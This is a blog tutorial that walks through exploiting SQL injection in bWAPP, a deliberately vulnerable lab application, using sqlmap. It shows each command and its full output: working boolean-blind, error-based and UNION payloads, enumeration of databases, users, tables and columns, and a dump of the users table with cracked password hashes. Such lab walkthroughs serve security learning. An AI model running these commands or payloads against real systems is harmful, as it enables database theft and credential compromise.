SQL Injection: How to use SQLMap penetration testing tool and exploiting SQL injection flaws (SQLMap with bwAPP )

SQL Injection :- It refers to an injection attack wherein an attacker can execute malicious SQL statements against a data driven venerable application. In another words, SQL statements are inserted into an input field (or URL) for execution and dump the database contents to the attacker, which leads to active and passive attacks.
In this post we will use sqlmap (an open source penetration testing tool) and show that how we can dump Database details with ease when we finds that application is vulnerable.

bWAPP is an web application deliberately design to learn security vulnerability ethically. In order to exploit this web application for SQL injection, first we setup SQLmap. I have downloaded and installed "sqlmapproject-sqlmap-1.1.4-1-gb4c4d3f.tar.gz".

Step 1: Get seesion info -  First get cookie from BurpSuite or or javascript:alert(document.cookie) in browser  :-  PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1; security_level=0

Step 2: - Find Vulnerable Parameter - put ' in text field and check for vulnerabliltiy. If we got an error. We know it is vulnerable because we have injected a single quote into the input field and it has returned a SQL error. Below screenshot shows the same.

Step 3:- Our first focus will be to find database name. Execute following command from sqlmap installation directory.
python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --dbs

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:42:28

[21:42:29] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:42:29] [INFO] testing connection to the target URL
[21:42:29] [WARNING] potential CAPTCHA protection mechanism detected
[21:42:29] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:42:29] [INFO] testing if the target URL is stable
[21:42:30] [INFO] target URL is stable
[21:42:30] [INFO] testing if GET parameter 'title' is dynamic
[21:42:30] [INFO] confirming that GET parameter 'title' is dynamic
[21:42:30] [INFO] GET parameter 'title' is dynamic
[21:42:30] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[21:42:30] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting attacks
[21:42:30] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[21:42:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:42:42] [WARNING] reflective value(s) found and filtering out
[21:42:43] [INFO] GET parameter 'title' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Z")
[21:42:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:43] [INFO] GET parameter 'title' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[21:42:43] [INFO] testing 'MySQL inline queries'
[21:42:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:42:43] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)  
[21:43:14] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[21:43:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:43:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:43:34] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:43:34] [INFO] target URL appears to have 7 columns in query
[21:43:34] [INFO] GET parameter 'title' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:43:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:43:38] [INFO] fetching database names
available databases [7]:
[*] bWAPP
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[21:43:38] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

[*] shutting down at 21:43:38

Step 4
:- Find all users of this system
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --users

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --users
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:52:28

[21:52:28] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:52:28] [INFO] resuming back-end DBMS 'mysql'
[21:52:28] [INFO] testing connection to the target URL
[21:52:29] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:52:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:52:29] [INFO] fetching database users
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'

[21:52:29] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

[*] shutting down at 21:52:29

Step 5:- Find all table names in database bWAPP.
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP --tables

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:58:33

[21:58:33] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:58:33] [INFO] resuming back-end DBMS 'mysql'
[21:58:33] [INFO] testing connection to the target URL
[21:58:34] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:58:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:58:34] [INFO] fetching tables for database: 'bWAPP'
Database: bWAPP
[6 tables]
+----------+
| blog     |
| dummy    |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+

[21:58:34] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

Step 6:- Find all column names of a given table - users
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users --columns

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:00:26

[22:00:27] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:00:27] [INFO] resuming back-end DBMS 'mysql'
[22:00:27] [INFO] testing connection to the target URL
[22:00:27] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[22:00:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[22:00:27] [INFO] fetching columns for table 'users' in database 'bWAPP'
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+

[22:00:27] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

Step 6:- Dumping users data - userid, password, etc.

python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:03:44

[22:03:44] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:03:44] [INFO] resuming back-end DBMS 'mysql'
[22:03:44] [INFO] testing connection to the target URL
[22:03:45] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[22:03:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[22:03:45] [INFO] fetching entries of column(s) 'email, login, password, secret' for table 'users' in database 'bWAPP'
[22:03:45] [INFO] analyzing table dump for possible password hashes
[22:03:45] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[22:04:16] [INFO] using hash method 'sha1_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/zytham/sqlmapprojet/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:04:17] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[22:04:20] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[22:04:20] [INFO] starting 4 processes
[22:04:25] [INFO] cracked password 'bug' for user 'A.I.M.'                                                      
[22:04:32] [INFO] postprocessing table dump                                                                    
Database: bWAPP
Table: users
[2 entries]
+--------+--------------------------+------------------------------------------------+-------------------------------------+
| login  | email                    | password                                       | secret                              |
+--------+--------------------------+------------------------------------------------+-------------------------------------+
| A.I.M. | bwapp-aim@mailinator.com | 6885858486f31043e5839c735d99457f045affd0 (bug) | A.I.M. or Authentication Is Missing |
| bee    | bwapp-bee@mailinator.com | 6885858486f31043e5839c735d99457f045affd0 (bug) | 9999                                |
+--------+--------------------------+------------------------------------------------+-------------------------------------+

[22:04:32] [INFO] table 'bWAPP.users' dumped to CSV file '/home/zytham/.sqlmap/output/192.168.213.142/dump/bWAPP/users.csv'
[22:04:32] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

Below screenshot the same , user details with decoded password.
Password can also be cracked using online program. Below screenshot shows the same-


For more detail about sqlmap, Refer: https://github.com/sqlmapproject/sqlmap/wiki

3 Comments

  1. I really thank you for your innovative post.I have never read a creative ideas like your posts.
    here after i will follow your posts which is very much help for my career.
    Selenium Training in Chennai
    Selenium Training
    JAVA Training in Chennai
    Python Training in Chennai
    Big data training in chennai
    SEO training in chennai
    Selenium Training in Chennai
    Selenium Training in Velachery

    ReplyDelete
  2. Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info. Penetration Testing Services

    ReplyDelete
Previous Post Next Post